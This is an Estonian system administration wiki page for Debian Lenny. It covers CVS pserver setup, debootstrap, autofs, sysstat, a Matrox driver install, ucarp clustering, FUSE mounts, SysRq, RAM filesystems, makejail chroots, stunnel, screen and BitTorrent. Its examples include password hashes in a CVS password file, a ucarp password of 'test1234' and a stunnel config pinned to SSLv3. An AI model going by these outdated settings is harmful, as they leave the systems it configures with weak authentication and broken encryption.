CVS_PSERV_LIMIT_CPU=hard
CVS_EXT_PASSWD_FILE=/etc/cvs-passwd

* inetd või xinetd kasutamisel vastavalt seadistusfailis /etc/inetd.conf peab sisalduma rida

cvspserver stream tcp nowait root /usr/sbin/tcpd /usr/sbin/cvs-pserver

või fail /etc/xinetd.d/cvs sisuga

service cvspserver
{
disable = no
socket_type = stream
protocol = tcp
wait = no
user = root
server = /usr/sbin/cvs-pserver
}

* repostitooriumide failide omanikud ja efektiivsed kasutajad failis on kirjeldatud /etc/cvs-repouids

/srv/cvs-loomaaed:cvs-loomaaed
/srv/cvs-propaganda:cvs-propaganda

Repositooriumide initsialiseerimiseks tuleb öelda

# su - cvs-loomaaed
$ cvs -d /srv/cvs-loomaaed init
# su - cvs-propaganda
$ cvs -d /srv/cvs-propaganda init

Paroolifaili /etc/cvs-passwd formaat on selline

/data/cvs-loomaaed
mart:CHHLHZezIWZZQ
priit:KbHgWDSglIOH.
/data/cvs-propaganda
mart:CHHLHZezIWZZQ
priit:KbHgWDSglIOH.

Projektid tuleb alguses hoidlasse importida vastavate kasutajatega

# su - cvs-loomaaed
$ cd /data/tmp/portaal-arendus
cvs-loomaaed$ cvs -d /data/cvs-loomaaed import -m "Loomaaia portaali arendus algab" portaal-arendus vt rt
# su - cvs-propaganada
$ cd /data/tmp/portaal-propaganda
cvs-propaganda$ cvs -d /data/cvs-propaganda import -m "Loomaaia propaganda algab" propaganada vt rt

====Moodulite kirjeldamine====

CVS all olevast projektist saab kopeerida ka üksikuid katalooge öeldes

$ cvs co projektinimi/katalooginimi

====Kasutamine Linuxi CVS kliendiga====

$ export CVSROOT=:pserver:kasutajanimi@cvs.loomaaed.tartu.ee:/data/cvs-loomaaed
$ cvs login
$ cvs co portaal-arendus
$ cvs logout

====Kasutamine Windowsi TortoiseCVS kliendiga====

[[Pilt:Tortoisecvs-1.gif]]

===Riistvara omadustega tegelevad utiliidid===

* lshw - esitab suhteliselt põhjaliku väljundi arvutisüsteemi riistvaralistest komponentidest, nt sellise

# apt-get install lshw

* ethtool

# apt-get install ethtool

===Debootstrap programmi kasutamine===

debootstrap programmiga saab näidatud kataloogi moodustada operatsioonisteemi juurfailisüsteemi

# debootstrap lenny /srv/lenny-chroot http://ftp.aso.ee/debian

Nt sobib seda kasutada töötava operatsioonisüsteemi sees olles multiboot arvuti moodustamiseks. Sel juhul tuleb Debian Lenny puhul lisaks tähele panna selliseid asjaolusid peale seda kui debootstrap on töö lõpetanud

* moodustada /etc/fstab sisu
* seadistada /etc/network/interfaces ja /etc/hosts
* kopeerida /lib/modules alla tuuma moodulid
* paigaldada udev, lvm2, vlan, firmware-bnx2, bridge-utils ja openssh-server tarkvara (ja muu oluline)
* kirjutada /etc/shadow faili juurkasutajale parool (konsoolilt saab küll login: root järel enterit öeldes sisse ka ilma paroolita)
* kopeerida tuum ja iniramfs /boot kataloogi
* paigaldada alglaadur (nt grub-install abil)
* seadistada ajavöönd, /etc/localtime link

Kui selliselt moodustatud keskkonda chrootida, siis üldiselt peaks olema eelnevalt ühendatud külge sellised failisüsteemid, eeldusel, et keskkond asub kataloogis /target

/dev/sda1 on /target/boot type ext3 (rw,noatime,errors=continue,data=ordered)
proc on /target/proc type proc (rw)
sysfs on /target/sys type sysfs (rw)
udev on /target/dev type tmpfs (rw,size=10240k,mode=755)
devpts on /target/dev/pts type devpts (rw,mode=600)

öeldes

# mount -t proc /proc /srv/lenny-32/proc
# mount -t devpts devpts /srv/lenny-32/dev/pts

debootstrap abil saab tekitada ka teisele arhitektuurile vastav failisüsteem, nt öeldes amd64 keskkonnas

# debootstrap --arch=i386 lenny /srv/lenny-32 http://ftp.aso.ee/debian

Uuemal ajal soovitatakse kasutada tarkvara multistrap.

===Autofs===

Selleks, et failisüsteem monteeritaks külge automaatselt vastava ühenduspunkti poole pöördumisel, sobib kasutada tarkvara autofs. Tarkvara paigaldamiseks tuleb öelda

# apt-get install autofs

Tarkvara kasutamiseks tuleb näidata seadistusfailis /etc/auto.master nn map failide asukohad, nt

# cat /etc/auto.master
/var/autofs /etc/auto.misc --timeout=60

kusjuures map failis /etc/auto.misc on kirjeldatud konkreetsed ressursid, nt

# cat /etc/auto.misc
cd -fstype=iso9660,ro,nosuid,nodev :/dev/cdrom
removable -fstype=ext3,ro :/dev/mapper/mpath3

Kui nüüd öelda muidu tühjas kataloogis /var/autofs 'ls -l', siis ühendatakse failisüsteem külge ning seejärel täidetakse ls käsk, nt

# cd /var/autofs/removable
drwx------ 2 root root 16384 Apr 11 14:13 lost+found

Ühendatud failisüsteemide parameetreid näeb nii

# mount | grep autofs
automount(pid7544) on /var/autofs type autofs (rw,fd=4,pgrp=7544,minproto=2,maxproto=4)
/dev/mapper/mpath3 on /var/autofs/removable type ext3 (ro)

Autofs olekut näeb öeldes

# /etc/init.d/autofs status
Configured Mount Points:
------------------------
/usr/sbin/automount --timeout=300 /home file /etc/auto.home

Active Mount Points:
--------------------
/usr/sbin/automount --pid-file=/var/run/autofs/_home.pid --timeout=300 /home file /etc/auto.home

====NFS ressursi ühendamine====

Nt kasutajate kodukataloogide üle NFS ühendamiseks tuleb kirjeldada nt selline /etc/auto.home fail

# cat /etc/auto.home
kernel -ro,soft,intr 192.168.10.249:/data/export

===Süsteemi ressursikasutuse jälgimine===

Pakett sysstat http://pagesperso-orange.fr/sebastien.godard/ sisaldab süsteemi ressurssikasutuse jälgimiseks vajalikke vahendeid, nii reaalajas kui taustal andmete kogumiseks

* reaalajas - iostat, pidstat, mpstat
* taustal - sa1, sa2, sar

Tarkvara käivitamist ja töötamist juhivad seadistusfailid

/etc/cron.d/sysstat
/etc/cron.daily/sysstat
/etc/default/sysstat

Taustal töötava sysstat töö tulemusena kogutakse andmed ja salvestatakse binaarses formaadis kataloogi /var/log/sysstat. Kogutud andmeid saab esitada nt selliselt

# sar -A -f /var/log/sysstat/sa22 | less

Eraldi mainimist vajab programm pidstat, mille abil saab jälgida üksiku protsessiga seotud ressursikasutust, nt plokkseadme IO'd

$ pidstat -d -p 15585 2
Linux 2.6.26-1-xen-amd64 (moraal.auul) 04/22/09 _x86_64_

20:13:28 PID kB_rd/s kB_wr/s kB_ccwr/s Command
20:13:30 15585 0.00 236.82 0.00 wget
20:13:32 15585 0.00 238.00 0.00 wget
20:13:34 15585 0.00 236.82 0.00 wget
20:13:36 15585 0.00 238.00 0.00 wget

Kõigi kasutaja postgres protsesside io'd saab uurida nt selliselt

$ pidstat -d -p ALL 2 | grep postgres

===Matrox P690 videokaardi kasutamine===

Matrox http://www.matrox.com/ valmistab suhteliselt eeskujulikke videokaarte. P690 mudeli kasutamiseks sobib kasutada aadressil http://www.matrox.com/graphics/en/products/graphics_cards/p_series/p690pci/ kopeeritud draiverit. Lisaks asub nö community-forum aadressil http://forum.tuxx-home.at/ ning sealsed entusiastid avaldavad oma parandustega draivereid.

====Paigaldamine====

# CC=/usr/bin/gcc-4.1 sh mtxdriver-installer-x86_32-cvs-20090511.run
..
Please, enter the directory to extract the files [/root/] /usr/src/mtx
Creating directory /usr/src/mtx/matroxdriver-x86_32-cvs-20090511
Verifying archive integrity... All good.
Uncompressing Matrox Parhelia Driver.
..
========================================
Matrox Linux Driver Install Script
========================================

Installation package v1.4.7

Refreshing ld database
Installing mtx_drv.so ...
Installing v4l_drv.so ...
Messages are being logged in file /tmp/make.log,
this might take some time.

Compiling mtx.ko ... done

Installing mtx.ko ...
Backing up libGL
Installing 32bits OpenGL library file to /usr/lib
Installing libGL.so.1.3.0 ...
Installing the GLX library file to /usr/lib/xorg/modules/extensions

Installing libglx.so ...
Installing the gl.h header file to /usr/include/GL

Installing gl.h ...
Installing the glext.h header file to /usr/include/GL

Installing glext.h ...
Installing the glx.h header file to /usr/include/GL

Installing glx.h ...
Updating library cache

Installing documentation

cp: cannot stat `v4l': No such file or directory
Installing powerdesk

Installing mtxcards ...
Installing mtxwizard ...
Installing matroxconfig ...
Installing libmtxcfg.so ...

Do you wish to let the installer setup your X config file (y/n)? y

Trying to configure your X config file (/etc/X11/xorg.conf)

Installation finished

Tulemusena on

* moodustatud nö vaikimisi /etc/X11/xorg.conf seadistusfail
* seadistusutiliit /usr/bin/matroxconfig
* kataloogi /usr/share/matrox on paigutatud teeke ja tekste
* kompileeritud ja paigaldatud tuuma moodul mtx.ko, mis on link /usr/share/matrox kataloogi failile

# find /lib/modules/2.6.26-2-686 -name mtx.ko -ls
721274 0 lrwxrwxrwx 1 root root 32 Aug 8 17:44 \
/lib/modules/2.6.26-2-686/kernel/drivers/video/mtx.ko -> /usr/share/matrox/current/mtx.ko

Süsteemi on lisatud/asendatud sellised failid

/usr/bin
/usr/bin/mtxwizard
/usr/bin/matroxconfig
/usr/share
/usr/share/mtxwizard
/usr/share/mtxwizard/mtxcards
/usr/share/matrox
/usr/share/matrox/samples
/usr/share/matrox/samples/XF86Config.QID_Quad_Hybrid
/usr/share/matrox/samples/XF86Config.QID_Quad_Merge
/usr/share/matrox/samples/XF86Config.triple
/usr/share/matrox/samples/XF86Config.QID_Triple_Hybrid_1
/usr/share/matrox/samples/XF86Config.T221-Merged
/usr/share/matrox/samples/XF86Config.merged
/usr/share/matrox/samples/XF86Config.dual
/usr/share/matrox/samples/XF86Config.QID_Triple_Hybrid_2
/usr/share/matrox/samples/XF86Config.single
/usr/share/matrox/samples/XF86Config.triple_merged
/usr/share/matrox/samples/XF86Config.T221-Xinerama
/usr/share/matrox/current
/usr/share/matrox/current/gl.h
/usr/share/matrox/current/libmtxcfg.so
/usr/share/matrox/current/mtxcards
/usr/share/matrox/current/mtx_drv.so
/usr/share/matrox/current/glx.h
/usr/share/matrox/current/glext.h
/usr/share/matrox/current/mtx.ko
/usr/share/matrox/current/v4l_drv.so
/usr/share/matrox/current/mtxwizard
/usr/share/matrox/current/libGL.so.1.3.0
/usr/share/matrox/current/matroxconfig
/usr/share/matrox/current/libglx.so
/usr/share/matrox/backup
/usr/share/matrox/docs
/usr/share/matrox/docs/readme.txt
/usr/share/matrox/docs/readme-advanced.txt
/usr/lib
/usr/lib/libGL.so.1.3.0
/usr/lib/libGL.so
/usr/lib/xorg/modules/extensions
/usr/lib/xorg/modules/extensions/libmtxcfg.so
/usr/lib/xorg/modules/extensions/libglx.so
/usr/lib/xorg/modules/drivers
/usr/lib/xorg/modules/drivers/mtx_drv.so
/usr/lib/xorg/modules/drivers/v4l_drv.so
/usr/lib/libGL.so.1
/usr/src/mtx
/usr/src/mtx/log
/usr/include/GL
/usr/include/GL/gl.h
/usr/include/GL/glx.h
/usr/include/GL/glext.h

Tuuma laadimisel öeldakse

# modprobe mtx
mtx: module license 'Copyright (c) 2002, 2004, Matrox Graphics Inc.' taints kernel.
[mtx] MTX driver v1.4.7
[mtx] Allocated a MTX agp driver structure
ACPI: PCI Interrupt 0000:03:00.0[A] -> GSI 21 (level, low) -> IRQ 21
[mtx] 0x2539(sub:0xffffffff) board found at 03:00.0

====Seadistamine====

Komplekt sisaldab ka graafilist haldusutiliiti matroxconfig, mille abil saab genereerida sobiva X serveri seadistusfaili /etc/X11/xorg.conf, nt sellise [[Pilt:Xorg.conf.patch]]

[[Pilt:Matroxconfig-1.gif]]

Käivitamisel öeldakse dmesg'i

[mtx] Registers at 0xe8000000, size: 8K, flags: 131588, knl_addr: 0xf8bb8000
[mtx] Framebuffer at 0xe0000000, size: 128M, flags: 135692, knl_addr: 0x00000000, write-combining: YES
[mtx] Busmastering flags:
[mtx] Board type detected: PCI
[mtx] Chipset 0x2539:0x102b was detected
[mtx] AGP chipset was detected
[mtx] PCI transfers available for read write
[mtx] Parhelia patches applied: PowerM Cap66Mhz CompBypass
[mtx] Registers at 0xe8000000, size: 8K, flags: 131588, knl_addr: 0xf8bb8000
[mtx] Framebuffer at 0xe0000000, size: 128M, flags: 135692, knl_addr: 0x00000000, write-combining: YES
[mtx] Busmastering flags:
[mtx] Board type detected: PCI
[mtx] Chipset 0x2539:0x102b was detected
[mtx] AGP chipset was detected
[mtx] PCI transfers available for read write
[mtx] Parhelia patches applied: PowerM Cap66Mhz CompBypass

X log võiks olla nt selline http://kuutorvaja.eenet.ee/mw-1.9.3/images/e/e1/Xorg.mtx-p690.patch

Kui töökohaarvuti vahetada säilitades videokaardi ja monitorid, siis tõenäoliselt piisab xorg.conf failis asendada seadme sektsioonides PCI BusID väärtus sobivaga

Section "Device"
# generated by mtx wizard
Identifier "mtxwizard_device_1"
Driver "mtx"
BusID "PCI:3:0:0"
Screen 1
EndSection

kusjuures õige saab teha kindlaks lspci utiliidiga

# lspci | grep Matrox
03:00.0 VGA compatible controller: Matrox Graphics, Inc. Millennium P690 (rev 01)

===lsattr ja chattr programmide kasutamine===

chattr programmi abil saab ext2 ja ext3 failisüsteemis seadistada failidele täiendavad omadusi. Näiteks, märkida faili immutable'ks

# chattr +i failinimi

Tulemusena ei saa seda faili ka kustutada juurkasutaja

# rm failinimi
rm: cannot remove `failinimi': Operation not permitted

Atribuutide väärtusi saab küsida öeldes

# lsattr failinimi
----i-------------- failinimi

immutable biti saab eemaldada öeldes

# chattr -i failinimi

===ucarp kasutamine===

ucarp http://www.ucarp.org/project/ucarp tarkvara abil on võimalik korraldada kahe või enama arvuti nn aktiivset/passiiveset klustrit kasutades CARP protokolli. Klustri igal arvutil on oma individuaalne ip aadress ning lisaks on määratud üks teenuse virtuaalne ip aadress. Sõltuvalt sellest, kuidas parasjagu on klustri osalesid masteri osas kokku leppinud pakub master teenust, teised on nö kõrval-seisvas (ingl. k. standby) asendis.

Tarkvara paigaldamiseks tuleb öelda

# apt-get install ucarp

Ning seadistamiseks tuleb nt kahe komponendilise klustri ühe arvuti võrguliideste seadistusfailis /etc/network/interfaces kasutada

auto eth0
iface eth0 inet static
address 192.168.10.51
gateway 192.168.10.254
netmask 255.255.255.0

ucarp-vid 3
ucarp-vip 192.168.10.48
ucarp-password test1234
ucarp-advskew 0
ucarp-advbase 1
ucarp-master yes

iface eth0:ucarp inet static
address 192.168.10.48
netmask 255.255.255.255

ning teise arvuti puhul

auto eth0
iface eth0 inet static
address 192.168.10.52
gateway 192.168.10.254
netmask 255.255.255.0

ucarp-vid 3
ucarp-vip 192.168.10.48
ucarp-password test1234
ucarp-advskew 10
ucarp-advbase 1
ucarp-master yes

iface eth0:ucarp inet static
address 192.168.10.48
netmask 255.255.255.255

Tulemusena on kokkulepitud masteris lisaks tavalistele vürguseadetele seade eth0:ucarp

eth0:ucarp Link encap:Ethernet HWaddr 70:01:68:01:00:51
inet addr:192.168.10.48 Bcast:192.168.10.255 Mask:255.255.255.255
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

ucarp on võrreldes keepalived või heartbeat tarkvaraga tagasihoidlikemate omadustega, kuid mõnel juhul võib just see ollagi eeliseks.

===FUSE===

Kui tavaliselt toimub failisüsteemidega tegelemine, nt külgeühendamine, privilegeeritud kasujana ning nn kernel-space'is, siis FUSE (Filesystem in Userspace) http://fuse.sourceforge.net/ tehnika võimaldab seda teha tavakasutajana user-space'is. Linuxi tuum sisaldab FUSE tuge ning paketihalduses on rohkesti FUSE funktsionaalsust kasutavat tarkvara. Üldkasutatavad FUSE utiliidid on paketis fuse-utils.

====curlftpfs====

curlftpfs abil saab nö külge monteerida ftp serverist ressurssi, tarkvara paigaldamiseks tuleb öelda

# apt-get install curlftpfs

Kasutmise peab kasutaja kuuluma gruppi fuse, ressursi külgeühendamine toimub öeldes

$ curlftpfs ftp://ftp.ee.debian.ee /tmp/ftp.ee.debian.org

ja lahtiühendamiseks

$ fusermount -u /tmp/ftp.ee.debian.org

Kasutamine toimub nii nagu tavalise kohaliku failisüsteemi kasutamine.

====SSHFS====

sshfs abil saab nö külge monteerida serverist, kuhu on ssh ligipääs, ressurssi, tarkvara paigaldamiseks tuleb öelda

# apt-get install sshfs

Kasutamise peab kuuluma gruppi fuse, külgeühendamiseks sobib öelda

$ sshfs mart@loomaaed.tartu.ee:/katalooginimi-ssh-serveris /katalooginimi-kohalikus-arvutis

Lahtiühendamiseks

$ fusermount -u /katalooginimi-kohalikus-arvutis

===SysRq===

Kui Linuxi tuum hangub, siis enamikul juhtudel on ta võimeline aru saama talle nö otse saadetud signaalidest. Lenny paketihalduse tuumaga saab vaikimisi SysRq'd kasutada, väljalülitamiseks tuleb parameetrile kernel.sysrq omistada väärtus null

# sysctl -w kernel.sysrq=0

* http://en.wikipedia.org/wiki/Magic_SysRq_key

====Füüsiliselt konsoolilt====

Füüsiliselt konsoolilt saab sisestada erinevaid kombinatsioone (kui SysRq klahv pole tähistatud, siis tavaliselt toimib sellena PrintScreen)

# failisüsteemide sünkroniseerimine - Alt-SysRq-s
# failisüsteemide read-only remountimine - Alt-SysRq-u
# arvuti reboot - Alt-SysRq-b

Iga tegevuse kohta antakse terminalile ka vastav teade.

====Käsurealt====

Kui aga arvutis ollakse eemal ning mingil põhjusel on siiski võimalik talle käske anda, kuigi ta käitub piisavalt juhtimatult, et selleks ettenähtud vahenditega rebooti teha, nt 'shutdown -r now', siis saab samasid tegevusi esile kutsuda selliselt

bash# echo s > /proc/sysrq-trigger
bash# echo u > /proc/sysrq-trigger
bash# echo b > /proc/sysrq-trigger

Ammendav loetelu võimalikest sisenditest on kirjas tuuma lähtetekstide kataloogis vist failis Documentation/kernel-parameters.txt.

====Xen konsoolilt====

Xeni konsoolilt saab saata SysRq signaale valides

Ctrl+O ja täht

h väljastab nimekirja toetatud signaalidest

SysRq : HELP : loglevel0-8 reBoot tErm Full kIll saK aLlcpus\
showMem Nice powerOff showPc show-all-timers(Q) unRaw Sync showTasks \
Unmount shoW-blocked-tasks

====Serial konsoolilt====

Serial konsoolilt saab tuumale SysRq signaali saata valides Break + täht.

===RAM failisüsteemid===

RAM failisüsteem võimaldab kasutada arvuti virtuaalmälu st RAM + swap ressursse failisüsteemina, nt sellised tehnikad

* tmpfs - tundub, et 2016 aasta seisuga on see üldiselt soovitatav ram failisüsteem, mõnes kohas kirjandus väidab, et tmpfs ei võimalda failisüsteemi suurust piirata, paistab, et see siiski ei ole nii
* ramfs - legacy ramfs, 2016 aasta seisuga üldiselt ei soovitata kasutada

====tmpfs====

tmpfs võimaldab kasutada arvuti virtuaalmälu st RAM + swap ressursse failisüsteemina. Kasutamine toimub selliselt

# mkdir /mnt/tmpfs
# mount -t tmpfs -o size=48g tmpfs /mnt/tmpfs

Kuna failisüsteem asub mälus, siis ta töötab kiiresti

# dd if=/dev/zero of=/mnt/tmpfs/1G bs=1M count=1024
1024+0 records in
1024+0 records out
1073741824 bytes (1.1 GB) copied, 0.981817 s, 1.1 GB/s

Traditsiooniline tmpfs ühenduspunkt tmpfs jaoks on /dev/shm mis on ka vaikimisi Debian Lenny puhul kasutuses

# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/system-root 4.0G 3.6G 236M 94% /
tmpfs 3.9G 0 3.9G 0% /lib/init/rw
udev 10M 60K 10M 1% /dev
tmpfs 3.9G 4.0K 3.9G 1% /dev/shm
/dev/sda1 107M 82M 20M 81% /boot

Süsteemi poolt vaikimisi kasutatavate tmpfs failisüsteemides on nt selline sisu

# find /dev/shm -ls
5812 0 drwxrwxrwt 3 root root 60 Jul 19 08:25 /dev/shm/
5964 0 drwxr-xr-x 2 root root 60 Jul 19 08:25 /dev/shm/network
6019 4 -rw-r--r-- 1 root root 16 Jul 19 08:25 /dev/shm/network/ifstate

ja

# find /lib/init/rw
/lib/init/rw
/lib/init/rw/sendsigs.omit.d
/lib/init/rw/sendsigs.omit.d/portmap
/lib/init/rw/.ramfs

Lisaks on /dev failisüsteem udev kasutamisel tmpfs peal, üldiselt sobib konkreetse süsteemi puhul küsida

# mount | grep tmpfs

====ramfs====

# mkdir /mnt/ramfs
# mount -t ramfs -o size=200m ramfs /mnt/ramfs

====Kasulikud lisamaterjalid====

* https://www.jamescoyle.net/knowledge/951-the-difference-between-a-tmpfs-and-ramfs-ram-disk

===makejail abil chroot keskkonna moodustamine===

Makejail programm abil saab moodustada chroot keskkonda, paigaldamiseks sobib öelda

# apt-get install makejail

Programmi tööd juhib seadistusfail, nt /root/makejail-bash.py, kus on antud juhul näidatud

* kuhu kataloogi moodustada chroot keskkond
* lisada sinna /bin/bash shell ning vastavad teegid lisada (antud juhul kasutatakse AMD64 platvormi)

# cat /root/makejail-bash.py
chroot="/home/mart"
forceCopy=["/lib64/ld-linux-x86-64.so.2", "/bin/bash","/lib/ld-linux-x86-64.so.2"]

moodustame kataloogi /home/mart

bash# mkdir /home/mart

ning moodustame sinna alla chroot keskkonna

bash# makejail /root/makejail-bash.py
Loading configuration file /root/makejail.py
Defining chroot = '/home/mart'
Defining forceCopy = ['/bin/bash']
Chroot directory is /home/mart
Initializing list of running processes
Executing : ps -e
Creating temp dir /tmp/makejail_logs
Adding files matching '/bin/bash'
Checking path '/bin/bash'
Dir '/home/mart/bin' missing
Checking path '/bin'
Making dir /home/mart/bin
..
Creating 'lib/libncurses.so.5' as a symlink to 'libncurses.so.5.5' (pwd=/home/mart/lib)
Executing : file /lib/libncurses.so.5
Sleeping for 2.00 seconds

Tulemusena tekib selline failistruktuur

bash# cd /home
bash# find mart -ls
507962 4 drwxr-xr-x 4 root root 4096 Sep 9 15:12 mart
507963 4 drwxr-xr-x 2 root root 4096 Sep 9 15:12 mart/lib
507968 1260 -rwxr-xr-x 1 root root 1286104 May 15 13:19 mart/lib/libc-2.3.6.so
507972 0 lrwxrwxrwx 1 root root 17 Sep 9 15:12 mart/lib/libncurses.so.5 -> libncurses.so.5.5
507973 100 -rwxr-xr-x 1 root root 97928 May 15 13:19 mart/lib/ld-2.3.6.so
507967 368 -rw-r--r-- 1 root root 369728 Oct 19 2006 mart/lib/libncurses.so.5.5
507974 0 lrwxrwxrwx 1 root root 11 Sep 9 15:12 mart/lib/ld-linux-x86-64.so.2 -> ld-2.3.6.so
507970 12 -rw-r--r-- 1 root root 10392 May 15 13:19 mart/lib/libdl-2.3.6.so
507971 0 lrwxrwxrwx 1 root root 14 Sep 9 15:12 mart/lib/libdl.so.2 -> libdl-2.3.6.so
507969 0 lrwxrwxrwx 1 root root 13 Sep 9 15:12 mart/lib/libc.so.6 -> libc-2.3.6.so
507964 0 lrwxrwxrwx 1 root root 4 Sep 9 15:12 mart/lib64 -> /lib
507965 4 drwxr-xr-x 2 root root 4096 Sep 9 15:12 mart/bin
507966 756 -rwxr-xr-x 1 root root 769368 Dec 11 2006 mart/bin/bash

Selleks, et veenduda kas kasutaja chroot keskkonna tekitamine õnnestus tuleb öelda, mille vastuseks saab shelli (ja siis öelda exit)

bash# chroot /home/mart
bash#

Nt sobib makejaili kasutada OpenSSH kasutajate chrootimisel.

Seda, kas protsess töötab chroot keskkonnas saab kontrollida nt küsides vastava pid kohta, kuis link on mitte / kataloogile, siis on protsess näidatud kataloogi chroot'itud

# ls -ld /proc/11091/root
lrwxrwxrwx 1 root root 0 Feb 2 22:39 /proc/11091/root -> /home/mart

===Peale crashi Debiani käima-aitamine===

Kui Debiani süsteem on crashinud, nt voolu kadumise tõttu, siis enamasti ext3 failisüsteem korrigeerib ennast ise, aga mõned rakendused on segaduses.

====Skype====

Skype teatab vahel, et 'Another Skype instance may exist', sel puhul ei pruugi aitada lock failide eemaldamine

$ rm .Skype/shared.lck .Skype/martkask/config.lck

aga võib aitada selline järgnevus

* käivitada Skype -dhpath võtmega ja logida korra sisse ning sulgeda programm (Quit), st nii, et protsess skype kaob

$ skype --dbpath=/home/mart/skype-tmp

* selleks, et chat history jms säiliks, kopeerida vana sisuga üle kontole vastava kastaloogi sisu

$ rsync -avH /home/mart/.Skype/martkask/ /home/mart/skype-tmp/martkask
$ mv /home/mart/.Skype /home/mart/.Skype-20090811-mittetootav
$ mv /home/mart/skype-tmp /home/mart/.Skype

* katsuda kasutada Skype'i edasi tavapärasel moel

====Icedove====

Programm ütleb käivitamisel, et '...', aitab kustutada failid

$ rm /home/mart/.mozilla-thunderbird/r4t56nog.default/.parentlock
$ rm /home/mart/.mozilla-thunderbird/r4t56nog.default/lock

ja proovida tavalisel moel edasi kasutada. Kontod jms seadistused peaksid nõnda säilima.

====Iceweasel====

Kui Iceweaseli kataloog .mozilla on ühendatud üle NFS'i siis on peale süsteemi crashi Iceweasel üsna katki. St *\lock\* failide eemaldamine näib mitte aitavat jne, väidetavalt on asi NFS ja Iceweaseli koostöös, tundub, et aitab korra .mozilla kataloog kokku ja lahti pakkida

$ tar cf .mozilla.tar .mozilla
$ rm -rf .mozilla
$ tar xf .morilla.tar
$ rm .mozilla.tar

===Stunnel4 kasutamine===

Stunnel http://www.stunnel.org/ tarkvara võimaldab ühendada kokku krüptimist iseenesest mitte toetavat klienti ja krüptitud teenust, või vastupidi. Või korraldada krüptimist mitte toetava kliendi ja serveri vahel siiski krüptitud andmevahetust.

Paigaldamiseks tuleb öelda

# apt-get install stunnel4

====Stunnel4 kliendi kasutamine krüptitud teenuse poole pöördumisel====

Seadistusfaili /etc/stunnel/stunnel.conf sobib kirjutada

sslVersion = SSLv3
chroot = /var/lib/stunnel4/
setuid = stunnel4
setgid = stunnel4
pid = /stunnel4.pid

socket = l:TCP_NODELAY=1
socket = r:TCP_NODELAY=1

output = /var/log/stunnel4/stunnel.log

client = yes

[smtps]
accept = 127.0.0.1:46525
connect = smtps.loomaaed.tartu.ee:465

tulemusena saab pöörduda smtp kliendiga krüptimata localhost:46525 porti, mida vahendatakse smtps.loomaaed.tartu.ee 465 krüptitud pordiga.

===Terminalihaldusprogrammi Screen kasutamine===

screen tarkvara peab olema paigaldatud kaughallatavasse arvutisse

# apt-get install screen

* screen käivitamiseks logida eemal olevasse arvutisse sisse ja öelda

$ screen

* Ctrl-a, c - tekita uus aken
* Ctrl-a, n - liigu järgmisse aknasse
* Ctrl-a, d - lase screenist lahti
* esita nimekiri arvutis olevatest kasutaja screenidest

$ screen -ls
There is a screen on:
2807.pts-5.pg2a (Detached)
1 Socket in /var/run/screen/S-postgres.

* ühendu näidatud screeniga

$ screen -r 2807.pts-5.pg2a

Süsteemis töötavate screenidele vastavaid protsesse näeb öeldes

# ps aux | grep SCREEN

Mitmekasutajarežiimis screen kasutamiseks saavad järgmised kasutajad ühenduda külge öeldes

$ screen -x

Screen logimiseks on -L võti, logi kirjutatakse faili screenlogN.log, või ^a-H.

Kui screen on attached olekus, aga vastav terminaliaken on nö kadunud, siis resumemiseks tuleb enne force'ida detach

$ screen -D

===IEEE 802.1X kasutamine===

TODO

* http://en.wikipedia.org/wiki/IEEE_802.1X
* http://www.cesnet.cz/doc/techzpravy/2007/802.1x-wired-authentication/

===Bittorrent===

Bittorrent on levinud P2P (peer-to-peer, ingl. k. osaliselt-osalisele) andmevahetusprotokoll, millele on iseloomulik, et suhtlemine leiab olulises osas aset otse osaliste endi vahel. Andmevahetusprotokoll on orienteeritud pigem suuremamahulisema andmevahetuse jaoks ning kopeeritud andmeid reeglina ei saa kasutada nö reaalajas kopeerimise käigus, vaid peale kopeerimise lõppu sobiva rakendusega. Nt kui tegu on video-materjaliga, siis saab seda videot asuda vaatama peale kopeerimise lõppu, mitte aga kopeerimise ajal.

====Bittorrenti kliendi kasutamine andmete kopeerimiseks====

Andmete kopeerimiseks võrgust kohalikku arvutisse on vaja teada huvipakkuva ressursi nö aadressi, mis esineb .torrent faili kujul. Nt jagatakse aadressilt http://www.debian.org/CD/torrent-cd/ edasi liikudes Debian operatsioonisüsteemi .torrent faile

http://cdimage.debian.org/debian-cd/5.0.3/amd64/bt-cd/debian-503-amd64-CD-1.iso.torrent

Debian Linux sisaldab mitmeid bittorrent kliente (nt rtorrent, qbittorrent, bittorrent, bittornado jt), mis võivad erineda kõigi või mõne aspekti poolest järgnevatest

* millises mahus on bittorrent protokoll toetatud
* kas programmil on graafiline, pseudo-graafiline (nn curses) või käsurea kasutajaliides

Konkreetselt qbittorrent kasutajaliides näeb välja nt selline

[[Pilt:bittorrent-1.gif]]

kust on näha

* kopeeritakse faili debian-503-amd64-CD-1.iso
* DL Speed on allalaadimise kiirus ja UP Speed üleslaadimise kiirus
* Seeds/Leechs näitab kui paljudelt osalistelt kasutaja kopeerib ja kui paljud temalt edasi kopeerivad
* sakil Search saab vaikimisi qbittorrenti klienti seadistatud trackereid kasutada otsinguks ja otsingu tulemustena leitud .torrenteid kopeerida

Kopeerimise alustamiseks tuleb valida nupp BT ning kopeerida sinna .torrent faili aadress, nt

http://cdimage.debian.org/debian-cd/5.0.3/amd64/bt-cd/debian-503-amd64-CD-1.iso.torrent

====Bittorrent kliendi kasutamine andmete jagamiseks====

Bittorrentiga on algajal kasutajal oluliselt lihtsam kopeerida andmeid endale kui pakkuda välja oma andmeid teistele kasutajatele.

.torrenti moodustamiseks sobib öelda (programmid on paketist bittorrent) eeldusel, et on olemas fail andmed.iso

$ btmakemetafile.bittorrent andmed.iso http://torrent.loomaaed.tartu.ee:80/announce

kus

* andmed.iso - lähtematerjal, mida asutakse välja jagama
* http://torrent.loomaaed.tartu.ee:80/announce - trackeri aadress

Käsu tulemusena moodustatakse vastav .torrent fail

andmed.iso.torrent

ning seejärel saab seda välja jagada nt nii

$ btdownloadcurses.bittorrent andmed.iso.torrent

====Kohaliku trackeri kasutamine====

bittorrent pakett sisaldab bittorrent tracker programmi bttrack. Trackeri käivitamiseks sobib öelda lihtsamal juhul

# bttrack --dfile dfail.log

mille tulemusena käivitub pordil 80 spetsiaalne http server, mis on valmis võtma vastu bittorrent klientide poolt infot andmete väljajagamise kohta ja teenindama bittorrenti kliente, kes soovivad andmeid endale kopeerida.

Selliselt käivitatud trackerit saab kasutada nt organisatsiooni siseselt, iseasi kas sellisel kasutusel erilist praktilist väärtust on.

====Transmission====

